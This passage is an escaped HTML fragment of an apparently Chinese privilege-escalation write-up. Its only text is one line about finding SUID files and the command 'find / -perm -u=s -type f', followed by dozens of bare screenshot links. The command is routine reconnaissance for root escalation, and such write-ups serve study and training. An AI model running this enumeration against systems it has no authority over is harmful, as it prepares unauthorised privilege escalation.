\u5148\u67e5\u627e\u4e00\u4e0bSUID\u6587\u4ef6\u6709\u54ea\u4e9b\uff1a<\/p>\n
find \/ -perm -u=s -type f 2>\/dev\/null<\/code><\/pre>\n
![\"image-20240224192920849\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151383.png\")
<\/div><\/p>\n![\"image-20240224193122225\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151385.png\")
<\/div>![\"image-20240224193202814\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151386.png\")
<\/div><\/p>\n![\"image-20240224193558142\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151387.png\")
<\/div><\/p>\n![\"image-20240224193711085\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151388.png\")
<\/div><\/p>\n![\"image-20240224194039610\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151389.png\")
<\/div><\/p>\n![\"image-20240224194148319\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151390.png\")
<\/div><\/p>\n![\"image-20240224194313319\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151391.png\")
<\/div><\/p>\n![\"image-20240224194510157\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151392.png\")
<\/div><\/p>\n![\"image-20240224200909565\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151393.png\")
<\/div><\/p>\n![\"image-20240224202717952\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151394.png\")
<\/div><\/p>\n![\"image-20240224210031499\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151395.png\")
<\/div>![\"image-20240224210152476\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151396.png\")
<\/div><\/p>\n![\"image-20240224211401425\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151397.png\")
<\/div><\/p>\n![\"image-20240224214458643\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151398.png\")
<\/div><\/p>\n![\"image-20240224214725210\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151399.png\")
<\/div><\/p>\n![\"image-20240224215948836\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151400.png\")
<\/div>![\"image-20240224215859358\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151401.png\")
<\/div><\/p>\n![\"image-20240225001309318\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151402.png\")
<\/div><\/p>\n![\"image-20240224220427298\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151403.png\")
<\/div><\/p>\n![\"image-20240225002852941\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151404.png\")
<\/div><\/p>\n![\"image-20240225002646382\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151405.png\")
<\/div><\/p>\n![\"image-20240225003045749\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151406.png\")
<\/div><\/p>\n![\"image-20240224220834963\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151407.png\")
<\/div><\/p>\n![\"image-20240224221053987\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151408.png\")
<\/div><\/p>\n![\"image-20240224221221469\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151409.png\")
<\/div><\/p>\n![\"image-20240224223927353\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151410.png\")
<\/div><\/p>\n![\"image-20240224224654508\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151411.png\")
<\/div><\/p>\n![\"image-20240224224843707\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151412.png\")
<\/div><\/p>\n![\"image-20240224225009591\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151413.png\")
<\/div><\/p>\n![\"image-20240224225351372\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151414.png\")
<\/div><\/p>\n![\"image-20240224225532579\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151415.png\")
<\/div><\/p>\n![\"image-20240224225833328\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151416.png\")
<\/div><\/p>\n![\"image-20240224230427559\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151417.png\")
<\/div><\/p>\n![\"image-20240224230527628\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151418.png\")
<\/div><\/p>\n![\"image-20240224230545762\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151419.png\")
<\/div><\/p>\n![\"image-20240224231201762\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151420.png\")
<\/div><\/p>\n![\"image-20240224231450895\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151421.png\")
<\/div><\/p>\n![\"image-20240224231726189\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151423.png\")
<\/div><\/p>\n![\"image-20240224233647333\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151424.png\")
<\/div><\/p>\n![\"image-20240224233931083\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151425.png\")
<\/div><\/p>\n![\"image-20240224234118791\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151426.png\")
<\/div><\/p>\n![\"image-20240224234210530\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151427.png\")
<\/div><\/p>\n![\"image-20240224234627591\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151428.png\")
<\/div><\/p>\n![\"image-20240224235127917\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151429.png\")
<\/div><\/p>\n![\"image-20240224234703997\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151430.png\")
<\/div>![\"image-20240224234845566\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151431.png\")
<\/div><\/p>\n![\"image-20240224235236310\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151432.png\")
<\/div><\/p>\n![\"image-20240224235437656\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151433.png\")
<\/div><\/p>\n![\"image-20240224235705249\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151434.png\")
<\/div><\/p>\n![\"image-20240224235931887\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151435.png\")
<\/div><\/p>\n![\"image-20240225000108698\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151436.png\")
<\/div><\/p>\n![\"image-20240225004916435\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151437.png\")
<\/div><\/p>\n![\"image-20240225011855018\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151438.png\")
<\/div><\/p>\n![\"image-20240225013016913\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151439.png\")
<\/div><\/p>\n![\"image-20240225013346414\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151440.png\")
<\/div><\/p>\n![\"image-20240225014300677\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151441.png\")
<\/div><\/p>\n![\"image-20240225014448067\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402250151442.png\")
<\/div><\/p>\n